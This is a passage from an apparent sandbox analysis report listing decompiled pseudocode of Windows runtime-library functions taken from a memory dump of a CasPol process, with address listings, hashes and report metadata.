																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = L0175FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = L0175FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1817b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1817b84 = _t75;
						_t73 = E0173EB70(_t134, 0x1817b60);
						if( *0x1817b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = L0173FF60( *0x1817b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                                                                                                                                                                                                                0x0175fab0
                                                                                                                                                                                                                                                                                                0x0175fab2
                                                                                                                                                                                                                                                                                                0x0175fab3
                                                                                                                                                                                                                                                                                                0x0175fab4
                                                                                                                                                                                                                                                                                                0x0175fabc
                                                                                                                                                                                                                                                                                                0x0175fac0
                                                                                                                                                                                                                                                                                                0x0175fb14
                                                                                                                                                                                                                                                                                                0x0175fb17
                                                                                                                                                                                                                                                                                                0x0175fac2
                                                                                                                                                                                                                                                                                                0x0175fac8
                                                                                                                                                                                                                                                                                                0x0175facd
                                                                                                                                                                                                                                                                                                0x0175fad3
                                                                                                                                                                                                                                                                                                0x0175fad3
                                                                                                                                                                                                                                                                                                0x0175fadd
                                                                                                                                                                                                                                                                                                0x0175fb18
                                                                                                                                                                                                                                                                                                0x0175fb1b
                                                                                                                                                                                                                                                                                                0x0175fb1d
                                                                                                                                                                                                                                                                                                0x0175fb1e
                                                                                                                                                                                                                                                                                                0x0175fb1f
                                                                                                                                                                                                                                                                                                0x0175fb20
                                                                                                                                                                                                                                                                                                0x0175fb21
                                                                                                                                                                                                                                                                                                0x0175fb22
                                                                                                                                                                                                                                                                                                0x0175fb23
                                                                                                                                                                                                                                                                                                0x0175fb24
                                                                                                                                                                                                                                                                                                0x0175fb25
                                                                                                                                                                                                                                                                                                0x0175fb26
                                                                                                                                                                                                                                                                                                0x0175fb27
                                                                                                                                                                                                                                                                                                0x0175fb28
                                                                                                                                                                                                                                                                                                0x0175fb29
                                                                                                                                                                                                                                                                                                0x0175fb2a
                                                                                                                                                                                                                                                                                                0x0175fb2b
                                                                                                                                                                                                                                                                                                0x0175fb2c
                                                                                                                                                                                                                                                                                                0x0175fb2d
                                                                                                                                                                                                                                                                                                0x0175fb2e
                                                                                                                                                                                                                                                                                                0x0175fb2f
                                                                                                                                                                                                                                                                                                0x0175fb3a
                                                                                                                                                                                                                                                                                                0x0175fb3b
                                                                                                                                                                                                                                                                                                0x0175fb3e
                                                                                                                                                                                                                                                                                                0x0175fb41
                                                                                                                                                                                                                                                                                                0x0175fb44
                                                                                                                                                                                                                                                                                                0x0175fb47
                                                                                                                                                                                                                                                                                                0x0175fb4a
                                                                                                                                                                                                                                                                                                0x0175fb4d
                                                                                                                                                                                                                                                                                                0x0175fb53
                                                                                                                                                                                                                                                                                                0x0179bdcb
                                                                                                                                                                                                                                                                                                0x0179bdcb
                                                                                                                                                                                                                                                                                                0x0175fb59
                                                                                                                                                                                                                                                                                                0x0175fb5b
                                                                                                                                                                                                                                                                                                0x0175fb5b
                                                                                                                                                                                                                                                                                                0x0175fb5e
                                                                                                                                                                                                                                                                                                0x0179bdd5
                                                                                                                                                                                                                                                                                                0x0179bdd8
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bdda
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bdda
                                                                                                                                                                                                                                                                                                0x0175fb64
                                                                                                                                                                                                                                                                                                0x0175fb64
                                                                                                                                                                                                                                                                                                0x0175fb64
                                                                                                                                                                                                                                                                                                0x0175fb67
                                                                                                                                                                                                                                                                                                0x0175fb6e
                                                                                                                                                                                                                                                                                                0x0175fb70
                                                                                                                                                                                                                                                                                                0x0175fb72
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fb78
                                                                                                                                                                                                                                                                                                0x0175fb7a
                                                                                                                                                                                                                                                                                                0x0175fb7a
                                                                                                                                                                                                                                                                                                0x0175fb7d
                                                                                                                                                                                                                                                                                                0x0175fb80
                                                                                                                                                                                                                                                                                                0x0179bddf
                                                                                                                                                                                                                                                                                                0x0179bde1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bde3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bde3
                                                                                                                                                                                                                                                                                                0x0175fb86
                                                                                                                                                                                                                                                                                                0x0175fb86
                                                                                                                                                                                                                                                                                                0x0175fb86
                                                                                                                                                                                                                                                                                                0x0175fb8b
                                                                                                                                                                                                                                                                                                0x0175fb90
                                                                                                                                                                                                                                                                                                0x0175fb92
                                                                                                                                                                                                                                                                                                0x0175fb94
                                                                                                                                                                                                                                                                                                0x0175fb9a
                                                                                                                                                                                                                                                                                                0x0175fb9b
                                                                                                                                                                                                                                                                                                0x0175fba1
                                                                                                                                                                                                                                                                                                0x0179bde8
                                                                                                                                                                                                                                                                                                0x0179bdeb
                                                                                                                                                                                                                                                                                                0x0179bded
                                                                                                                                                                                                                                                                                                0x0179beb5
                                                                                                                                                                                                                                                                                                0x0179beb5
                                                                                                                                                                                                                                                                                                0x0179bebb
                                                                                                                                                                                                                                                                                                0x0179bebd
                                                                                                                                                                                                                                                                                                0x0179bec3
                                                                                                                                                                                                                                                                                                0x0179bed2
                                                                                                                                                                                                                                                                                                0x0179bedd
                                                                                                                                                                                                                                                                                                0x0179bedd
                                                                                                                                                                                                                                                                                                0x0179beed
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bdf3
                                                                                                                                                                                                                                                                                                0x0179bdfe
                                                                                                                                                                                                                                                                                                0x0179be06
                                                                                                                                                                                                                                                                                                0x0179be0b
                                                                                                                                                                                                                                                                                                0x0179be0d
                                                                                                                                                                                                                                                                                                0x0179be0f
                                                                                                                                                                                                                                                                                                0x0179be14
                                                                                                                                                                                                                                                                                                0x0179be19
                                                                                                                                                                                                                                                                                                0x0179be20
                                                                                                                                                                                                                                                                                                0x0179be25
                                                                                                                                                                                                                                                                                                0x0179be27
                                                                                                                                                                                                                                                                                                0x0179be35
                                                                                                                                                                                                                                                                                                0x0179be39
                                                                                                                                                                                                                                                                                                0x0179be46
                                                                                                                                                                                                                                                                                                0x0179be4f
                                                                                                                                                                                                                                                                                                0x0179be54
                                                                                                                                                                                                                                                                                                0x0179be56
                                                                                                                                                                                                                                                                                                0x0179bef8
                                                                                                                                                                                                                                                                                                0x0179bef8
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179be5c
                                                                                                                                                                                                                                                                                                0x0179be5c
                                                                                                                                                                                                                                                                                                0x0179be60
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179be66
                                                                                                                                                                                                                                                                                                0x0179be66
                                                                                                                                                                                                                                                                                                0x0179be7f
                                                                                                                                                                                                                                                                                                0x0179be84
                                                                                                                                                                                                                                                                                                0x0179be87
                                                                                                                                                                                                                                                                                                0x0179be89
                                                                                                                                                                                                                                                                                                0x0179be8b
                                                                                                                                                                                                                                                                                                0x0179be99
                                                                                                                                                                                                                                                                                                0x0179be9d
                                                                                                                                                                                                                                                                                                0x0179bea0
                                                                                                                                                                                                                                                                                                0x0179beac
                                                                                                                                                                                                                                                                                                0x0179beaf
                                                                                                                                                                                                                                                                                                0x0179beb1
                                                                                                                                                                                                                                                                                                0x0179beb3
                                                                                                                                                                                                                                                                                                0x0179beb3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bea2
                                                                                                                                                                                                                                                                                                0x0179bea2
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bea2
                                                                                                                                                                                                                                                                                                0x0179be8d
                                                                                                                                                                                                                                                                                                0x0179be8d
                                                                                                                                                                                                                                                                                                0x0179be92
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179be92
                                                                                                                                                                                                                                                                                                0x0179be8b
                                                                                                                                                                                                                                                                                                0x0179be60
                                                                                                                                                                                                                                                                                                0x0179be3b
                                                                                                                                                                                                                                                                                                0x0179be3b
                                                                                                                                                                                                                                                                                                0x0179be3e
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179be40
                                                                                                                                                                                                                                                                                                0x0179be40
                                                                                                                                                                                                                                                                                                0x0179be44
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179be44
                                                                                                                                                                                                                                                                                                0x0179be3e
                                                                                                                                                                                                                                                                                                0x0179be29
                                                                                                                                                                                                                                                                                                0x0179be29
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179be29
                                                                                                                                                                                                                                                                                                0x0179be27
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fba7
                                                                                                                                                                                                                                                                                                0x0175fba7
                                                                                                                                                                                                                                                                                                0x0175fbab
                                                                                                                                                                                                                                                                                                0x0179bf02
                                                                                                                                                                                                                                                                                                0x0175fbb1
                                                                                                                                                                                                                                                                                                0x0175fbb1
                                                                                                                                                                                                                                                                                                0x0175fbb8
                                                                                                                                                                                                                                                                                                0x0175fbbd
                                                                                                                                                                                                                                                                                                0x0175fbbd
                                                                                                                                                                                                                                                                                                0x0175fbbf
                                                                                                                                                                                                                                                                                                0x0175fbbf
                                                                                                                                                                                                                                                                                                0x0175fbc5
                                                                                                                                                                                                                                                                                                0x0175fbcb
                                                                                                                                                                                                                                                                                                0x0175fbf8
                                                                                                                                                                                                                                                                                                0x0175fbf8
                                                                                                                                                                                                                                                                                                0x0175fbfa
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fc00
                                                                                                                                                                                                                                                                                                0x0175fc00
                                                                                                                                                                                                                                                                                                0x0175fc03
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fc09
                                                                                                                                                                                                                                                                                                0x0175fc09
                                                                                                                                                                                                                                                                                                0x0175fc0f
                                                                                                                                                                                                                                                                                                0x0175fc15
                                                                                                                                                                                                                                                                                                0x0175fc23
                                                                                                                                                                                                                                                                                                0x0175fc23
                                                                                                                                                                                                                                                                                                0x0175fc25
                                                                                                                                                                                                                                                                                                0x0175fc27
                                                                                                                                                                                                                                                                                                0x0175fc75
                                                                                                                                                                                                                                                                                                0x0175fc7c
                                                                                                                                                                                                                                                                                                0x0175fc84
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fc29
                                                                                                                                                                                                                                                                                                0x0175fc29
                                                                                                                                                                                                                                                                                                0x0175fc2d
                                                                                                                                                                                                                                                                                                0x0175fc30
                                                                                                                                                                                                                                                                                                0x0179bf0f
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fc36
                                                                                                                                                                                                                                                                                                0x0175fc38
                                                                                                                                                                                                                                                                                                0x0175fc3b
                                                                                                                                                                                                                                                                                                0x0175fc41
                                                                                                                                                                                                                                                                                                0x0179bf17
                                                                                                                                                                                                                                                                                                0x0179bf19
                                                                                                                                                                                                                                                                                                0x0179bf48
                                                                                                                                                                                                                                                                                                0x0179bf4b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bf1b
                                                                                                                                                                                                                                                                                                0x0179bf22
                                                                                                                                                                                                                                                                                                0x0179bf24
                                                                                                                                                                                                                                                                                                0x0179bf26
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bf2c
                                                                                                                                                                                                                                                                                                0x0179bf37
                                                                                                                                                                                                                                                                                                0x0179bf39
                                                                                                                                                                                                                                                                                                0x0179bf3b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bf41
                                                                                                                                                                                                                                                                                                0x0179bf41
                                                                                                                                                                                                                                                                                                0x0179bf41
                                                                                                                                                                                                                                                                                                0x0179bf41
                                                                                                                                                                                                                                                                                                0x0179bf45
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bf45
                                                                                                                                                                                                                                                                                                0x0179bf3b
                                                                                                                                                                                                                                                                                                0x0179bf26
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fc47
                                                                                                                                                                                                                                                                                                0x0175fc47
                                                                                                                                                                                                                                                                                                0x0175fc49
                                                                                                                                                                                                                                                                                                0x0175fcb2
                                                                                                                                                                                                                                                                                                0x0175fcb4
                                                                                                                                                                                                                                                                                                0x0175fcb6
                                                                                                                                                                                                                                                                                                0x0175fcdc
                                                                                                                                                                                                                                                                                                0x0175fcdc
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fcb8
                                                                                                                                                                                                                                                                                                0x0175fcc3
                                                                                                                                                                                                                                                                                                0x0175fcc5
                                                                                                                                                                                                                                                                                                0x0175fcc7
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fcc9
                                                                                                                                                                                                                                                                                                0x0175fcc9
                                                                                                                                                                                                                                                                                                0x0175fccd
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fccd
                                                                                                                                                                                                                                                                                                0x0175fcc7
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fc4b
                                                                                                                                                                                                                                                                                                0x0175fc4b
                                                                                                                                                                                                                                                                                                0x0175fc4e
                                                                                                                                                                                                                                                                                                0x0175fc4e
                                                                                                                                                                                                                                                                                                0x0175fc51
                                                                                                                                                                                                                                                                                                0x0175fc51
                                                                                                                                                                                                                                                                                                0x0175fc54
                                                                                                                                                                                                                                                                                                0x0175fc5a
                                                                                                                                                                                                                                                                                                0x0175fc5c
                                                                                                                                                                                                                                                                                                0x0175fc5f
                                                                                                                                                                                                                                                                                                0x0175fc61
                                                                                                                                                                                                                                                                                                0x0175fc63
                                                                                                                                                                                                                                                                                                0x0175fc65
                                                                                                                                                                                                                                                                                                0x0175fc67
                                                                                                                                                                                                                                                                                                0x0175fc6e
                                                                                                                                                                                                                                                                                                0x0175fc72
                                                                                                                                                                                                                                                                                                0x0175fc72
                                                                                                                                                                                                                                                                                                0x0175fc72
                                                                                                                                                                                                                                                                                                0x0175fc72
                                                                                                                                                                                                                                                                                                0x0175fc67
                                                                                                                                                                                                                                                                                                0x0175fc61
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fc5a
                                                                                                                                                                                                                                                                                                0x0175fc49
                                                                                                                                                                                                                                                                                                0x0175fc41
                                                                                                                                                                                                                                                                                                0x0175fc30
                                                                                                                                                                                                                                                                                                0x0175fc27
                                                                                                                                                                                                                                                                                                0x0175fc03
                                                                                                                                                                                                                                                                                                0x0175fbcd
                                                                                                                                                                                                                                                                                                0x0175fbd3
                                                                                                                                                                                                                                                                                                0x0175fbd9
                                                                                                                                                                                                                                                                                                0x0175fbdc
                                                                                                                                                                                                                                                                                                0x0175fbde
                                                                                                                                                                                                                                                                                                0x0175fc99
                                                                                                                                                                                                                                                                                                0x0175fc9b
                                                                                                                                                                                                                                                                                                0x0175fc9d
                                                                                                                                                                                                                                                                                                0x0175fcd5
                                                                                                                                                                                                                                                                                                0x0175fcd5
                                                                                                                                                                                                                                                                                                0x0175fc89
                                                                                                                                                                                                                                                                                                0x0175fc89
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fc9f
                                                                                                                                                                                                                                                                                                0x0175fc9f
                                                                                                                                                                                                                                                                                                0x0175fca3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fca3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fbe4
                                                                                                                                                                                                                                                                                                0x0175fbe4
                                                                                                                                                                                                                                                                                                0x0175fbe4
                                                                                                                                                                                                                                                                                                0x0175fbe4
                                                                                                                                                                                                                                                                                                0x0175fbe9
                                                                                                                                                                                                                                                                                                0x0175fbf2
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175fbf2
                                                                                                                                                                                                                                                                                                0x0175fbde
                                                                                                                                                                                                                                                                                                0x0175fbcb
                                                                                                                                                                                                                                                                                                0x0175fbab
                                                                                                                                                                                                                                                                                                0x0175fc8b
                                                                                                                                                                                                                                                                                                0x0175fc8b
                                                                                                                                                                                                                                                                                                0x0175fc8c
                                                                                                                                                                                                                                                                                                0x0175fb80
                                                                                                                                                                                                                                                                                                0x0175fb72
                                                                                                                                                                                                                                                                                                0x0175fb5e
                                                                                                                                                                                                                                                                                                0x0175fc8d
                                                                                                                                                                                                                                                                                                0x0175fc91
                                                                                                                                                                                                                                                                                                0x0175fadf
                                                                                                                                                                                                                                                                                                0x0175fadf
                                                                                                                                                                                                                                                                                                0x0175fae1
                                                                                                                                                                                                                                                                                                0x0175fae4
                                                                                                                                                                                                                                                                                                0x0175fae7
                                                                                                                                                                                                                                                                                                0x0175faec
                                                                                                                                                                                                                                                                                                0x0175faf8
                                                                                                                                                                                                                                                                                                0x0175fb00
                                                                                                                                                                                                                                                                                                0x0175fb07
                                                                                                                                                                                                                                                                                                0x0175fb0f
                                                                                                                                                                                                                                                                                                0x0175fb0f
                                                                                                                                                                                                                                                                                                0x0175fb07
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175faf8
                                                                                                                                                                                                                                                                                                0x0175fadd

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0179BE0F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                                                                                                                                                                                                • API String ID: 0-865735534
                                                                                                                                                                                                                                                                                                • Opcode ID: d022d26c7f2b5f05123d5ab79915d51a73538b2489f742e3d93191b33f22b87e
                                                                                                                                                                                                                                                                                                • Instruction ID: bafb06eca7424d25b1e5ab459e3d825c88cb07c524a2e76ed75b1cc8c0c4f4a7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d022d26c7f2b5f05123d5ab79915d51a73538b2489f742e3d93191b33f22b87e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7A12171B00606CBEB66DB68D454B7AF7A9AF48710F04457EEE06CB681DBB0D845CB90
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0175F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                                			E0175F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01744120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01769830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01769990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E017695D0();
							goto L11;
						} else {
							_t109 = L01744620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0176F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E017695D0();
										L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                                                                                                                                                                                                                0x0175f0d3
                                                                                                                                                                                                                                                                                                0x0175f0d9
                                                                                                                                                                                                                                                                                                0x0175f0e0
                                                                                                                                                                                                                                                                                                0x0175f0e7
                                                                                                                                                                                                                                                                                                0x0175f0f2
                                                                                                                                                                                                                                                                                                0x0175f0f4
                                                                                                                                                                                                                                                                                                0x0175f0f8
                                                                                                                                                                                                                                                                                                0x0175f100
                                                                                                                                                                                                                                                                                                0x0175f108
                                                                                                                                                                                                                                                                                                0x0175f10d
                                                                                                                                                                                                                                                                                                0x0175f115
                                                                                                                                                                                                                                                                                                0x0175f116
                                                                                                                                                                                                                                                                                                0x0175f11f
                                                                                                                                                                                                                                                                                                0x0175f123
                                                                                                                                                                                                                                                                                                0x0175f124
                                                                                                                                                                                                                                                                                                0x0175f12c
                                                                                                                                                                                                                                                                                                0x0175f130
                                                                                                                                                                                                                                                                                                0x0175f134
                                                                                                                                                                                                                                                                                                0x0175f13d
                                                                                                                                                                                                                                                                                                0x0175f144
                                                                                                                                                                                                                                                                                                0x0175f14b
                                                                                                                                                                                                                                                                                                0x0175f152
                                                                                                                                                                                                                                                                                                0x0179bab0
                                                                                                                                                                                                                                                                                                0x0179bab0
                                                                                                                                                                                                                                                                                                0x0175f158
                                                                                                                                                                                                                                                                                                0x0175f158
                                                                                                                                                                                                                                                                                                0x0175f15a
                                                                                                                                                                                                                                                                                                0x0175f160
                                                                                                                                                                                                                                                                                                0x0175f165
                                                                                                                                                                                                                                                                                                0x0175f166
                                                                                                                                                                                                                                                                                                0x0175f16f
                                                                                                                                                                                                                                                                                                0x0175f173
                                                                                                                                                                                                                                                                                                0x0179baa7
                                                                                                                                                                                                                                                                                                0x0179baa7
                                                                                                                                                                                                                                                                                                0x0179baab
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175f179
                                                                                                                                                                                                                                                                                                0x0175f18d
                                                                                                                                                                                                                                                                                                0x0175f191
                                                                                                                                                                                                                                                                                                0x0179baa2
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175f197
                                                                                                                                                                                                                                                                                                0x0175f19b
                                                                                                                                                                                                                                                                                                0x0175f1a2
                                                                                                                                                                                                                                                                                                0x0175f1a9
                                                                                                                                                                                                                                                                                                0x0175f1af
                                                                                                                                                                                                                                                                                                0x0175f1b2
                                                                                                                                                                                                                                                                                                0x0175f1b6
                                                                                                                                                                                                                                                                                                0x0175f1b9
                                                                                                                                                                                                                                                                                                0x0175f1c4
                                                                                                                                                                                                                                                                                                0x0175f1d8
                                                                                                                                                                                                                                                                                                0x0175f1df
                                                                                                                                                                                                                                                                                                0x0175f1e3
                                                                                                                                                                                                                                                                                                0x0175f1eb
                                                                                                                                                                                                                                                                                                0x0175f1ee
                                                                                                                                                                                                                                                                                                0x0175f1f4
                                                                                                                                                                                                                                                                                                0x0175f20f
                                                                                                                                                                                                                                                                                                0x0179bab7
                                                                                                                                                                                                                                                                                                0x0179babb
                                                                                                                                                                                                                                                                                                0x0179bacc
                                                                                                                                                                                                                                                                                                0x0179bad1
                                                                                                                                                                                                                                                                                                0x0175f215
                                                                                                                                                                                                                                                                                                0x0175f218
                                                                                                                                                                                                                                                                                                0x0175f226
                                                                                                                                                                                                                                                                                                0x0175f22b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0175f22b
                                                                                                                                                                                                                                                                                                0x0175f1f6
                                                                                                                                                                                                                                                                                                0x0175f1f6
                                                                                                                                                                                                                                                                                                0x0175f1f9
                                                                                                                                                                                                                                                                                                0x0175f1fb
                                                                                                                                                                                                                                                                                                0x0175f1fb
                                                                                                                                                                                                                                                                                                0x0175f1f4
                                                                                                                                                                                                                                                                                                0x0175f191
                                                                                                                                                                                                                                                                                                0x0175f173
                                                                                                                                                                                                                                                                                                0x0175f152
                                                                                                                                                                                                                                                                                                0x0175f203

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a84a962c915fffa03329b69f4511eb9490debe772323dbad7c7018630595a99
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7517A71504711AFC321DF29C840A6BFBF8FF48750F00892AFA9597690E7B4E904CBA1
                                                                                                                                                                                                                                                                                                Uniqueness

